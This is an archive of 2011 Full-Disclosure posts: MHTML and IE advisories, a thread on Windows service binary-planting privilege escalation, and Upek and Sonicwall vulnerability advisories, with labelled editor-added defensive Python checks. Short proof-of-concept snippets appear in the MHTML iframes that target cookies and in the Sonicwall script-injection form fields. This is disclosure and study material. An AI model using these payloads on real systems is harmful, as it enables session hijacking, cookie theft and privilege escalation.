[Full-disclosure] MHTML Mime-Formatted Request Vulnerability Again

2011-09-25 Thread IEhrepus
MHTML Mime-Formatted Request Vulnerability Again

Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2011/09/23
Release: http://www.80vul.com/mhtml/mhtml-again.txt

Overview:

After MS11-057, I tested and found that the MHTML Mime-Formatted Request
Vulnerability occurs again.

Test this code on win2k3/vista + IE8 with the latest patches:

<iframe src="mhtml:http://www.80vul.com/mhtml/zz.php!cookie"></iframe>

<iframe src="http://www.80vul.com/mhtml/zz.php"></iframe>

We get this effect:

http://www.80vul.com/mhtml/ie8new.png


Disclosure Timeline:

2011/08/20 - Found this Vulnerability and Submit to Microsoft Security
2011/09/23 - A reply from MS, but no further follow-up, so public

References:
[1] 
http://www.80vul.com/webzine_0x05/0x05%20IE%E4%B8%8BMHTML%E5%8D%8F%E8%AE%AE%E5%B8%A6%E6%9D%A5%E7%9A%84%E8%B7%A8%E5%9F%9F%E5%8D%B1%E5%AE%B3.html

[2] http://www.80vul.com/mhtml/Hacking%20with%20mhtml%20protocol%20handler.txt


hitest
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
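Added example (editor's code, not part of the 80vul advisory and not a reconstruction of zz.php): it shows how an mhtml: URL of the form mhtml:<root-url>!<part-name>, which is what the first iframe above hands to IE, is resolved against a multipart/related (MHTML) body, and a check that flags a response whose declared Content-Type is not multipart but whose body nonetheless carries MHTML part markers. The response body, the boundary string and the part contents are constructed here; only the URL and the part name "cookie" come from the advisory. The point that matters for the cross-domain issue discussed in reference [1] is that the selected part is rendered in the security context of the root URL's origin, not the attacker's.

```python
"""
Added example, not code from the 80vul advisory: resolve an mhtml: URL of
the form  mhtml:<root-url>!<part-name>  against a multipart/related body,
and flag a response whose declared Content-Type is not multipart but whose
body carries MHTML part markers anyway.  SAMPLE_BODY is a constructed
stand-in for the advisory's zz.php response, whose real contents are not
shown; the part name "cookie" is taken from the advisory's test URL.
"""
import re
from email import message_from_bytes, policy

MHTML_SCHEME = "mhtml:"

# Constructed stand-in for the zz.php response: the server declares
# text/plain, yet the body is a well-formed MHTML document with one part
# whose Content-Location is "cookie".
SAMPLE_HEADERS = {"Content-Type": "text/plain"}
SAMPLE_BODY = (
    b"MIME-Version: 1.0\n"
    b"Content-Type: multipart/related; boundary=\"_80vul_\"\n"
    b"\n"
    b"--_80vul_\n"
    b"Content-Type: text/html\n"
    b"Content-Location: cookie\n"
    b"\n"
    b"<html><body>part body rendered as HTML</body></html>\n"
    b"--_80vul_--\n"
)


def split_mhtml_url(url):
    """Split 'mhtml:<root>!<part>' into (root_url, part_name or None)."""
    if not url.lower().startswith(MHTML_SCHEME):
        raise ValueError("not an mhtml: URL: %r" % url)
    root, sep, part = url[len(MHTML_SCHEME):].partition("!")
    return root, (part if sep else None)


def parse_parts(body):
    """Parse an MHTML body into {content_location: (content_type, text)}."""
    msg = message_from_bytes(body, policy=policy.default)
    parts = {}
    if not msg.is_multipart():
        return parts
    for part in msg.iter_parts():
        loc = part.get("Content-Location")
        if loc:
            parts[str(loc).strip()] = (part.get_content_type(), part.get_content())
    return parts


def resolve(url, body):
    """Return the (content_type, text) named by the URL's '!part', or None."""
    _root, part_name = split_mhtml_url(url)
    if part_name is None:
        return None
    return parse_parts(body).get(part_name)


# An MHTML header line inside the body, capturing its boundary string.
_MULTIPART_LINE = re.compile(
    rb"^content-type:\s*multipart/related\b.*?boundary=\"?([^\";\r\n]+)",
    re.I | re.M,
)


def looks_like_mhtml(headers, body):
    """True when the declared Content-Type is not multipart/* but the body
    contains an MHTML header line whose boundary actually occurs in it."""
    declared = headers.get("Content-Type", "").lower()
    if declared.startswith("multipart/"):
        return False
    m = _MULTIPART_LINE.search(body)
    return bool(m) and (b"--" + m.group(1)) in body


if __name__ == "__main__":
    url = "mhtml:http://www.80vul.com/mhtml/zz.php!cookie"
    print(split_mhtml_url(url))
    print(resolve(url, SAMPLE_BODY))
    print(looks_like_mhtml(SAMPLE_HEADERS, SAMPLE_BODY))
```

On a live server you would feed looks_like_mhtml() the real response headers and body of each page you serve; a hit on a page that was never meant to be MHTML is what lets that page serve as the root of somebody else's mhtml: URL.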

[Full-disclosure] Allowed From http:// To file:// In The Third-party Browser of IE

2011-09-25 Thread IEhrepus
Allowed From http:// To file:// In The Third-party Browser of IE

Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2011/09/23

Overview:

After MS11-057, going from http:// to file:// is not allowed, but it still
works in third-party browsers built on IE.


Disclosure Timeline:

2011/08/20 - Found this Vulnerability and Submit to Microsoft Security
2011/09/23 - A reply from MS, but no further follow-up, so public

References:
[1]
http://www.80vul.com/webzine_0x05/0x06%20%E8%B5%B0%E5%90%91%E6%9C%AC%E5%9C%B0%E7%9A%84%E9%82%AA%E6%81%B6%E4%B9%8B%E8%B7%AF.html

hitest

[Full-disclosure] Privilege escalation on Windows using Binary Planting

2011-09-25 Thread Madhur Ahuja
Imagine a situation where I have a Windows system with restricted user
access and want to get Administrator access.

There are many services in Windows which run under the SYSTEM account.

If there exists even one such service whose executable is not protected by
Windows File Protection, isn't it possible to execute malicious code (such
as gaining Administrator access) simply by replacing the service executable
with a malicious one and then restarting the service?

As a restricted user, what's stopping me from doing this?

Is there any integrity check performed by services.msc or by the service itself
before it executes under the SYSTEM account?

Madhur

Re: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting

2011-09-25 Thread kz20fl
To replace a service executable you usually need administrator access anyway.



Sent from my POS BlackBerry wireless device, which may wipe itself at any moment


Re: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting

2011-09-25 Thread Travis Biehn
It might be a fun experiment to see what DLLs they're looking for :.)


-Travis

-- 
Twitter https://twitter.com/tbiehn | LinkedIn http://www.linkedin.com/in/travisbiehn |
GitHub http://github.com/tbiehn | TravisBiehn.com http://www.travisbiehn.com

Re: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting

2011-09-25 Thread GloW - XD
Good luck with that... you might want to look into msgina.dll , try replace
that ;)
have phun
xd



Re: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting

2011-09-25 Thread Thor (Hammer of God)
Maybe he can trick the user into installing on a FAT32 partition first, and
THEN get them to execute from a remote share!


Re: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting

2011-09-25 Thread GloW - XD
Haha, too good and too true Thor!

Maybe he can trick the user into installing on a FAT32 partition first, and
THEN get them to execute from a remote share!

Rofl x10.

Agreed, this kind of attack is NOT feasible in 2011; try maybe 2006.

Anyhow, it has been a pleasure ending this BS, I think, once and for all.
Look up how winlogon works for one thing, then look at how Windows creates
and maintains a service_table, and then at the DLLs, which are protected of course;
you cannot touch msgina.dll without A LOT of help from a rootkit or something
similar, in which case, why would you need to?
You could add an admin, hidden, in a simple bat file script (yes I do have
my own code but no, it is not for kids..); this is 10 seconds and hidden, so
when you have gotten that far, why would you bother to hijack a DLL?

You CANNOT do crap without complete ADMIN, not SYSTEM, ADMIN$ share, and
total access to all sockets, meaning all pipe control, and that's where half of
Windows exchanges SMB shares for one thing. You guys don't seem to know CRAP
about Windows to start with, then have the gall to raise such a frigging
ridiculous topic about a non-happening. YOUTUBE ONE 'real' event of this
being useful, or even just working, and I would look, but you won't, cannot,
and will never be able to, especially on newer systems of Windows 7-8.
As I said earlier, enjoy your BS DLL hijacking, but MS don't care for it,
and whatever patches they instilled don't touch even service_table.. so
they have not given it a high prio, and why should they.

This is simply a case of a secteam gaining notoriety, to try and make this a
'big bug!!', to try and gain brownie points from MS. Even though I don't
believe in many things MS, I know the Windows system, and how to break it,
better than many people, and I can tell you now, this whole DLL hijack is a
complete and utter waste of your time.
But... keep on going, maybe MS will send you another 'thankyou' email ;)
xd / crazycoders.com / #haxnet@Ef





Re: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting

2011-09-25 Thread Travis Biehn
GloW: there's a lot of 3rd party software that installs itself as windows
services.

-Travis


Re: [Full-disclosure] Privilege escalation on Windows using Binary Planting

2011-09-25 Thread Madhur Ahuja
I haven't sent this email without doing a proof of concept. It actually works
with *Google Update Service*.

The restricted user can replace GoogleUpdate.exe to execute malicious code.
This service is installed by any Google component such as Picasa, Google
Talk, etc.

http://www.google.com/support/installer/bin/answer.py?answer=98805

Madhur


Re: [Full-disclosure] Privilege escalation on Windows using Binary Planting

2011-09-25 Thread GloW - XD
Hmm, that sounds a bit too good to be true :P
I'd love to see what it involves... i.e., the PoC... and I don't use
googleupdate, so why would this affect non-Chrome users... I dunno... still
seems like not enough there to convince me yet, sorry.
xd



On 26 September 2011 11:18, Madhur Ahuja ahuja.mad...@gmail.com wrote:

 I havn't sent this email without doing a Proof of concept. It actually
 works with *Google Update Service*.

 The restricted user can replace GoogleUpdate.exe to execute malicious code.
 This service is installed by any of Google component such as Picasa, Google
 Talk etc.

 http://www.google.com/support/installer/bin/answer.py?answer=98805

 Madhur

 On Monday, September 26, 2011, GloW - XD wrote:

 Haha , too good and too true thor !

 Maybe he can trick the user into installing on a FAT32 partition first,
 and THEN get the to execute from a remote share!

 Rofl x10.

 Agreed , this kind of attack, is NOT deasible in 2011, try maybe, 2006.

 Anyhow it has been a pleasure, ending this BS i think once and for all,
 lookup how winlogon works for one thing, then look at how windows creates
 and maintains a service_table, and then at the dlls, wich are protected ofc,
 you cannot touch msgina.dll,without ALOT of help from a rootkit or something
 similar, in wich case, why would you need to ?
 You could add an admin, hidden, and in simple batfile script (yes i do
 have my own code but no it is not for kids..), this is 10seconds and hidden,
 so when you have gotten that far, why would you bother to hijack a dll ?

 You CANNOT do crap,without complete ADMIN not SYSTEm, ADMIN$ share, and
 total axcs to all sockets, meaning, all pipe control and thats where half of
 windows exchanges smb shares for one thing, you guys dont seem to know CRAP
 about windows to start with, then have the gall to raise such a frigging
 ridiculous topic about a non happening, YOUTUBE ONE 'real' event, of this
 being useful, or, even just working, and i would look but, you wont, cannot,
 and will never be able to, especially on newer systems of windows7-8.
 As i said earlier, enjoy your bs DFLL hijacking, but ms, dont care for it,
 and whatever patches they instilled, dont touch even service_table.. so,
 they have not given it a high prio,and why shuld they.

 This is simply a case of a secteam gaining notoriety, to try and make this
 a 'big bug!!' , to try and gain brownie points from MS. Even tho, i dont
 believe in many things MS, I know windows system, and how to break it,
 better than many people, and i can tell you now, this whole DLL hijack, is a
 complete and utter waste of your times.
 But... keep on going, maybe MS will send you another 'thankyou' email ;)
 xd / crazycoders.com / #haxnet@Ef




 On 26 September 2011 10:52, Thor (Hammer of God) t...@hammerofgod.comwrote:

  Maybe he can trick the user into installing on a FAT32 partition first,
 and THEN get the to execute from a remote share!

 On Sep 25, 2011, at 5:30 PM, Travis Biehn tbi...@gmail.com wrote:

   It might be a fun experiment to see what DLLs they're looking for :.)


 -Travis

 On Sun, Sep 25, 2011 at 2:57 PM, kz2...@googlemail.com wrote:

 To replace a service executable you usually need administrator access
 anyway.


 --Original Message--
 From: Madhur Ahuja
 Sender: full-disclosure-boun...@lists.grok.org.uk
 To: security-bas...@securityfocus.com
 To: full-disclosure@lists.grok.org.uk
 Subject: [Full-disclosure] Privilege escalation on Windows using
 BinaryPlanting
 Sent: 25 Sep 2011 19:31

 Imagine a situation where I have a Windows system with the restricted
 user access and want to get the Administrator access.

 There are many services in Windows which run with SYSTEM account.

 If there exists even one such service whose executable is not
 protected by Windows File Protection, isn't it possible to execute
 malicious code (such as gaining Administrator access) simply by
 replacing the service executable with malicious one and then
 restarting the service.

 As a restricted user, what's stopping me to do this ?

 Is there any integrity check performed by services.msc or service
 itself before executing with SYSTEM account ?

 Madhur

 ___
 Full-Disclosure - We believe in it.
 Charter:  http://lists.grok.org.uk/full-disclosure-charter.html
 http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
 http://secunia.com/

  Sent from my POS BlackBerry  wireless device, which may wipe itself at
 any moment




  --
 Twitter https://twitter.com/tbiehn |
 LinkedIn http://www.linkedin.com/in/travisbiehn |
 GitHub http://github.com/tbiehn | http://www.travisbiehn.com
 

Re: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting

2011-09-25 Thread Thor (Hammer of God)
You'd have to be admin to install as a service, and the service would obviously 
need to then be running as local system to be of benefit (beyond what a normal 
user could do anyway) AND the installer would have to grant a normal user 
rights to overwrite it.

Certainly possible, but the developer would have to go out of their way to 
screw that up. And if they did, it still wouldn't be because of the OS...

T


On Sep 25, 2011, at 6:18 PM, Travis Biehn tbi...@gmail.com wrote:

GloW: there's a lot of 3rd party software that installs itself as windows 
services.

-Travis

On Sun, Sep 25, 2011 at 9:15 PM, GloW - XD doo...@gmail.com wrote:
Haha , too good and too true thor !


Maybe he can trick the user into installing on a FAT32 partition first, and 
THEN get the to execute from a remote share!

Rofl x10.

Agreed , this kind of attack, is NOT feasible in 2011, try maybe, 2006.

Anyhow it has been a pleasure, ending this BS i think once and for all, lookup 
how winlogon works for one thing, then look at how windows creates and 
maintains a service_table, and then at the dlls, which are protected ofc, you 
cannot touch msgina.dll, without A LOT of help from a rootkit or something 
similar, in which case, why would you need to ?
You could add an admin, hidden, and in simple batfile script (yes i do have my 
own code but no it is not for kids..), this is 10 seconds and hidden, so when 
you have gotten that far, why would you bother to hijack a dll ?

You CANNOT do crap, without complete ADMIN not SYSTEM, ADMIN$ share, and total 
access to all sockets, meaning, all pipe control and thats where half of windows 
exchanges smb shares for one thing, you guys dont seem to know CRAP about 
windows to start with, then have the gall to raise such a frigging ridiculous 
topic about a non happening, YOUTUBE ONE 'real' event, of this being useful, 
or, even just working, and i would look but, you wont, cannot, and will never 
be able to, especially on newer systems of windows7-8.
As i said earlier, enjoy your bs DLL hijacking, but ms, dont care for it, and 
whatever patches they instilled, dont touch even service_table.. so, they have 
not given it a high prio, and why should they.

This is simply a case of a secteam gaining notoriety, to try and make this a 
'big bug!!' , to try and gain brownie points from MS. Even tho, i dont believe 
in many things MS, I know windows system, and how to break it, better than many 
people, and i can tell you now, this whole DLL hijack, is a complete and utter 
waste of your times.
But... keep on going, maybe MS will send you another 'thankyou' email ;)
xd / crazycoders.com / #haxnet@Ef





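The condition the thread converges on, that a service is only a local privilege-escalation risk when it runs as a privileged account and a low-privileged principal can write to its executable or to the directory beside it, as an added audit example that is not part of any of the posts. The service records and ACL entries are constructed; on a real host they would be read from the Service Control Manager and the file system (Get-Acl / icacls), and the Example* names and paths are illustrative only. Spooler is included as the clean control case.

```python
from dataclasses import dataclass

# Accounts whose compromise means full control of the host.
SYSTEM_ACCOUNTS = {"LocalSystem", "NT AUTHORITY\\SYSTEM"}
# Principals a restricted user belongs to; write rights granted to these are the problem.
LOW_PRIV_PRINCIPALS = {"BUILTIN\\Users", "Everyone", "NT AUTHORITY\\Authenticated Users"}
# icacls-style simple rights that allow changing or adding files.
WRITE_RIGHTS = {"W", "M", "F"}


@dataclass
class Ace:
    principal: str
    rights: str          # icacls simple right: "RX", "W", "M", "F"
    allow: bool = True


@dataclass
class Service:
    name: str
    account: str         # account the service runs as (sc qc / Win32_Service StartName)
    binary_path: str
    binary_acl: list     # ACEs on the executable itself
    dir_acl: list        # ACEs on the directory that contains it


def low_priv_writers(acl):
    """Low-privileged principals holding write, modify or full control in this ACL."""
    return sorted({ace.principal for ace in acl
                   if ace.allow and ace.principal in LOW_PRIV_PRINCIPALS
                   and ace.rights in WRITE_RIGHTS})


def audit(services):
    """Flag services whose binary a restricted user could replace, or whose
    directory a restricted user could add files to (the DLL-planting case).
    Severity is 'high' when the service runs as SYSTEM, 'medium' otherwise."""
    findings = []
    for svc in services:
        replaceable = low_priv_writers(svc.binary_acl)   # binary itself writable
        plantable = low_priv_writers(svc.dir_acl)        # containing directory writable
        if not (replaceable or plantable):
            continue
        findings.append({
            "service": svc.name,
            "account": svc.account,
            "severity": "high" if svc.account in SYSTEM_ACCOUNTS else "medium",
            "binary_writable_by": replaceable,
            "dir_writable_by": plantable,
        })
    return findings


# Constructed inventory: the Example* names, paths and ACLs are illustrative, not real-host data.
CONSTRUCTED_SERVICES = [
    Service("Spooler", "LocalSystem", r"C:\Windows\System32\spoolsv.exe",
            [Ace("BUILTIN\\Users", "RX"), Ace("BUILTIN\\Administrators", "F")],
            [Ace("BUILTIN\\Users", "RX"), Ace("BUILTIN\\Administrators", "F")]),
    # Installer granted Users modify rights on the binary: replaceable, runs as SYSTEM.
    Service("ExampleAgent", "LocalSystem", r"C:\Program Files\Example\agent.exe",
            [Ace("BUILTIN\\Users", "M"), Ace("BUILTIN\\Administrators", "F")],
            [Ace("BUILTIN\\Users", "RX"), Ace("BUILTIN\\Administrators", "F")]),
    # Same misconfiguration, but a less privileged service account.
    Service("ExampleUpdater", "NT AUTHORITY\\NetworkService", r"C:\Program Files\Example\updater.exe",
            [Ace("Everyone", "F")], [Ace("Everyone", "F")]),
    # Binary locked down, but anyone can drop files beside it.
    Service("ExampleDropDir", "LocalSystem", r"C:\Tools\svc.exe",
            [Ace("BUILTIN\\Administrators", "F")], [Ace("Everyone", "W")]),
]


if __name__ == "__main__":
    for f in audit(CONSTRUCTED_SERVICES):
        print(f"[{f['severity']}] {f['service']} ({f['account']}): "
              f"binary writable by {f['binary_writable_by'] or '-'}, "
              f"directory writable by {f['dir_writable_by'] or '-'}")
```

Only the second, third and fourth constructed services are reported; Spooler, whose binary and directory grant Users read/execute only, is exactly the default Thor describes, and it is the installer's ACL choice, not the OS, that turns a service into a finding.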

Re: [Full-disclosure] Privilege escalation on Windows using Binary Planting

2011-09-25 Thread Madhur Ahuja
I agree. I am only talking of the scenario where this service is
pre-installed.


On Monday, September 26, 2011, Thor (Hammer of God) wrote:

  You'd have to be admin to install as a service, and the service would
 obviously need to then be running as local system to be of benefit (beyond
 what a normal user could do anyway) AND the installer would have to grant a
 normal user rights to overwrite it.

  Certainly possible, but the developer would have to go out of their way
 to screw that up. And if they did, it still wouldn't be because of the OS...

  T


 On Sep 25, 2011, at 6:18 PM, Travis Biehn tbi...@gmail.com wrote:

   GloW: there's a lot of 3rd party software that installs itself as
 windows services.

  -Travis

 On Sun, Sep 25, 2011 at 9:15 PM, GloW - XD doo...@gmail.com wrote:

 Haha , too good and too true thor !


 Maybe he can trick the user into installing on a FAT32 partition first, and
 THEN get the to execute from a remote share!

  Rofl x10.

 Agreed , this kind of attack, is NOT deasible in 2011, try maybe, 2006.

 Anyhow it has been a pleasure, ending this BS i think once and for all,
 lookup how winlogon works for one thing, then look at how windows creates
 and maintains a service_table, and then at the dlls, wich are protected ofc,
 you cannot touch msgina.dll,without ALOT of help from a rootkit or something
 similar, in wich case, why would you need to ?
 You could add an admin, hidden, and in simple batfile script (yes i do have
 my own code but no it is not for kids..), this is 10seconds and hidden, so
 when you have gotten that far, why would you bother to hijack a dll ?

 You CANNOT do crap,without complete ADMIN not SYSTEm, ADMIN$ share, and
 total axcs to all sockets, meaning, all pipe control and thats where half of
 windows exchanges smb shares for one thing, you guys dont seem to know CRAP
 about windows to start with, then have the gall to raise such a frigging
 ridiculous topic about a non happening, YOUTUBE ONE 'real' event, of this
 being useful, or, even just working, and i would look but, you wont, cannot,
 and will never be able to, especially on newer systems of windows7-8.
 As i said earlier, enjoy your bs DFLL hijacking, but ms, dont care for it,
 and whatever patches they instilled, dont touch even service_table.. so,
 they have not given it a high prio,and why shuld they.

 This is simply a case of a secteam gaining notoriety, to try and make this
 a 'big bug!!' , to try and gain brownie points from MS. Even tho, i dont
 believe in many things MS, I know windows system, and how to break it,
 better than many people, and i can tell you now, this whole DLL hijack, is a
 complete and utter waste of your times.
 But... keep on going, maybe MS will send you another 'thankyou' email ;)
 xd / http://crazycoders.comcrazycoders.com / #haxnet@Ef





 On 26 September 2011 10:52, Thor (Hammer of God) t...@hammerofgod.comwrote:

  Maybe he can trick the user into installing on a FAT32 partition first,
 and THEN get the to execute from a remote share!

 On Sep 25, 2011, at 5:30 PM, Travis Biehn tbi...@gmail.com wrote:

   It might be a fun experiment to see what DLLs they're looking for :.)


 -Travis

 On Sun, Sep 25, 2011 at 2:57 PM, kz2...@googlemail.com wrote:

 To replace a service executable you usually need administrator access
 anyway.


 --Original Message--
 From: Madhur Ahuja
 Sender:


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Privilege escalation on Windows using Binary Planting

2011-09-25 Thread GloW - XD
I agree. I am only talking of the scenario where this service is
pre-installed.

But before it was all about 3rd party addons which run as a service... it is
not happening, i can tell u this from many yrs of exp with windows, it wont
happen.
MS will not rewrite sdks, ddks, its whole stdafx/msdn architecture for coding,
because of 3rd party addons..
cheers.
xd



On 26 September 2011 11:41, Madhur Ahuja ahuja.mad...@gmail.com wrote:

 I agree. I am only talking of the scenario where this service is
 pre-installed.


 On Monday, September 26, 2011, Thor (Hammer of God) wrote:

  You'd have to be admin to install as a service, and the service would
 obviously need to then be running as local system to be of benefit (beyond
 what a normal user could do anyway) AND the installer would have to grant a
 normal user rights to overwrite it.

  Certainly possible, but the developer would have to go out of their way
 to screw that up. And if they did, it still wouldn't be because of the OS...

  T



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Upek Protector Suite QL 2011 - VTP Buffer Overflow Vulnerability

2011-09-25 Thread resea...@vulnerability-lab.com
Title:
==
Upek Protector Suite QL 2011 - Buffer Overflow Vulnerability


Date:
=
2011-09-26


References:
===
http://www.vulnerability-lab.com/get_content.php?id=259


VL-ID:
=
259


Abstract:
=
The Vulnerability Lab Research Team discovered a Buffer Overflow Vulnerability 
in the UPEK Protector Suite QL used in combination with the Eikon fingerprint 
scanner device.


Report-Timeline:

2011-04-03: Vendor Notification
2011-04-19: Vendor Notification
2011-**-**: Vendor Response/Feedback
2011-**-**: Vendor Fix/Patch
2011-09-24: Public or Non-Public Disclosure


Status:

Published


Affected Products:
==
Upek Protector Suite QL 2011
Upek Protector Suite QL 5.x


Exploitation-Technique:
===
Local


Severity:
=
High


Details:

A Buffer Overflow vulnerability was detected in UPEK Protector Suite QL v5.x / 
version 2011 in combination with the EikonTouch USB peripheral. The 
vulnerability allows a local attacker to crash the EikonTouch USB peripheral 
device driver/software via a local buffer overflow. The bug is located in the 
profile import module of the software, which fails when processing specially 
crafted (manipulated) .vtp profile files.

Vulnerable Module(s):
[+] .VTP FILE - USERNAME


Note: After the software crash, the fingerprint reader's device driver crashes 
too, and all control center functions remain unavailable.


Analyse(s):
../FingerprintSensorVersion.txt
../Report.wer

../upeksvr.exe_b0585871d7999ad31630447670a0d1d084e7436_1331e935.wer
../WERC0A1.tmp.appcompat.txt
../WERC1E9.tmp.WERInternalMetadata.xml
../WERC1FA.tmp.WERDataCollectionFailure.txt

../AppCrash_ctlcntrv.exe_f93f6c2a8899fbd4ca04bd90d32dae3d4dbe7_13bce09e


Picture(s):
../1.png
../2.png
../3.png
../4.png
../5.png
../6.png
../7.png
../2011_1.png
../2011_2.png
../IMAG0267.jpg
../IMAG0268.jpg
../IMAG0270.jpg
../IMAG0272.jpg
../wrong.png


Video(s):
[+] http://www.vulnerability-lab.com/get_content.php?id=283


Proof of Concept:
=
This vulnerability can be exploited by a local attacker. For demonstration or 
to reproduce ...

Review:  *.vtp

PoC:

../poc.vtp




Solution:
=
Restrict the username field to a fixed maximum length to prevent buffer 
overflows when processing .vtp files that carry an overlong username.
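The check the Solution section calls for, as an added example that is not Upek's code. The advisory does not document the .vtp layout, so the record format used here (a sequence of tag / 16-bit little-endian length / value fields, with tag 0x01 for the username) and the 31-byte limit are assumptions; the point is that the declared length is validated against both the bytes actually present in the file and the fixed maximum before any copy happens, so an overlong or lying length field is refused rather than written past the end of a buffer.

```python
import struct

TAG_USERNAME = 0x01        # assumed tag values
TAG_TEMPLATE = 0x02
USERNAME_MAX = 31          # assumed limit for the username field, in bytes


class VtpError(ValueError):
    """Raised for any record that fails validation; the importer must not use such a file."""


def parse_vtp(data: bytes) -> dict:
    """Parse a constructed TLV profile, refusing any field whose declared length
    is not backed by real bytes or exceeds the buffer it would be copied into."""
    fields = {}
    pos = 0
    while pos < len(data):
        if len(data) - pos < 3:
            raise VtpError(f"truncated field header at offset {pos}")
        tag, length = struct.unpack_from("<BH", data, pos)
        pos += 3
        remaining = len(data) - pos
        if length > remaining:                       # file claims more bytes than it holds
            raise VtpError(f"field 0x{tag:02x} declares {length} bytes but only {remaining} remain")
        value = data[pos:pos + length]
        pos += length
        if tag == TAG_USERNAME:
            if length > USERNAME_MAX:                # the overflow condition from the advisory
                raise VtpError(f"username length {length} exceeds maximum {USERNAME_MAX}")
            try:
                fields["username"] = value.decode("ascii")
            except UnicodeDecodeError:
                raise VtpError("username contains non-ASCII bytes") from None
        elif tag == TAG_TEMPLATE:
            fields["template"] = value
        else:
            fields.setdefault("unknown_tags", []).append(tag)
    if "username" not in fields:
        raise VtpError("profile has no username field")
    return fields


def encode_field(tag: int, value: bytes, declared: int = None) -> bytes:
    """Constructed encoder. `declared` lets a test record lie about its length,
    the way a manipulated file would."""
    length = len(value) if declared is None else declared
    return struct.pack("<BH", tag, length) + value


def check(data: bytes) -> str:
    """Convenience wrapper: 'ok' or the reason the record was refused."""
    try:
        parse_vtp(data)
        return "ok"
    except VtpError as err:
        return f"rejected: {err}"


# Constructed sample records.
GOOD = encode_field(TAG_USERNAME, b"alice") + encode_field(TAG_TEMPLATE, bytes(range(16)))
OVERLONG = encode_field(TAG_USERNAME, b"A" * 200) + encode_field(TAG_TEMPLATE, b"\x00" * 16)
LYING = encode_field(TAG_USERNAME, b"bob", declared=5000)   # length field larger than the file
TRAILING = GOOD + b"\x01\x00"                                # header cut off mid-field

if __name__ == "__main__":
    for name, rec in [("good", GOOD), ("overlong", OVERLONG), ("lying", LYING), ("trailing", TRAILING)]:
        print(f"{name:9s} {check(rec)}")
```

The two length checks are deliberately separate: the first protects the parser from reading past the end of the file, the second protects the destination buffer; a native importer needs both before it reaches anything like memcpy or strcpy.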


Risk:
=
The security risk of the local buffer overflow vulnerability is estimated as 
high(-).


Credits:

Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages, even if Vulnerability-Lab or its suppliers 
have been advised of the possibility of such damages. Some states do not allow 
the exclusion or limitation of liability for consequential or incidental 
damages so the foregoing limitation may not apply. Any modified copy or 
reproduction, including partially usages, of this file requires authorization 
from Vulnerability-Lab. Permission to electronically redistribute this alert in 
its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2011 | Vulnerability-Lab




-- 
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com


___
Full-Disclosure - We believe in it.

[Full-disclosure] Sonicwall Viewpoint v6.x - Multiple Web Vulnerabilities

2011-09-25 Thread resea...@vulnerability-lab.com
Title:
==
Sonicwall Viewpoint v6.x - Multiple Web Vulnerabilities


Date:
=
2011-09-26


References:
===
http://www.vulnerability-lab.com/get_content.php?id=195


VL-ID:
=
195


Introduction:
=
SonicWALL® ViewPoint™ is a user-friendly, web-based reporting tool that fully 
supports and extends SonicWALL's security products and services. It can be 
deployed flexibly as software or as a virtual appliance. Comprehensive 
reporting functions give administrators immediate insight into the state, 
performance and security of their network. With its customisable overview 
dashboard and a wide range of historical reports, SonicWALL ViewPoint helps 
organisations of all sizes monitor network usage and security activity and 
view web usage.

(Copy of the Vendor Homepage: 
http://www.sonicwall.com/de/Centralized_Management_and_Reporting.html)


Abstract:
=
Vulnerability-Lab Team discovered multiple Input Validation Vulnerabilities on 
SonicWalls Viewpoint appliance/application.


Report-Timeline:

2011-05-16: Vendor Notification
2011-06-21: Vendor Response/Feedback
2011-**-**: Vendor Fix/Patch
2011-09-26: Public or Non-Public Disclosure


Status:

Published


Affected Products:
==
Sonicwall Viewpoint v6.x  older versions


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

1.1
Multiple persistent input validation vulnerabilities are detected in 
Sonicwall's ViewPoint global management application.
The persistent vulnerability allows a local, low-privileged user account to 
manipulate specific application modules or content requests.


Vulnerable Module(s): (Persistent)

[+] SonicWall Training (Title; RSS_URL; Logs Mail)
[+] Current Sessions (Title)
[+] Add Componente
[+] Report Layout / Template
[+] Scheduled Reports
[+] Security Dashboard
[+] Custom Report – Website Filtering
[+] SonicWall Today
[+] SonicToday Pagetitle
[+] SonicToday log title


1.2
Multiple non-persistent input validation vulnerabilities are detected in 
Sonicwall's ViewPoint global management application.
The non-persistent vulnerability allows a remote attacker to hijack a 
customer/admin session; a high degree of user interaction is required.

Vulnerable Module(s): (Non Persistent)  

[+] FTP Usage / Top Users of FTP / Web Usage Top Sites
[+] Show Logs
[+] Description
[+] Security Dashboard


Picture(s):
../ive1.png
../ive2.png
../ive3.png


Proof of Concept:
=
The vulnerabilities can be exploited by remote attackers or by local, 
low-privileged user accounts.
For demonstration or to reproduce ...

Section: Top FTP Users
<input type="hidden" name="reportType" value="singleday_report" />
<input type="hidden" name="wrapped" value="INSERT YOUR SCRIPTCODE HERE!" />
<input type="hidden" name="updatePerm" value="1" />
<input type="hidden" name="node_id" value="UT1258498415223005056BA2A2D" />
<input type="hidden" name="t" value="Reports_FTPUsage_ByUser_Snwls" />
<input type="hidden" name="level" value="3" />
<input type="hidden" name="r" value="60" />
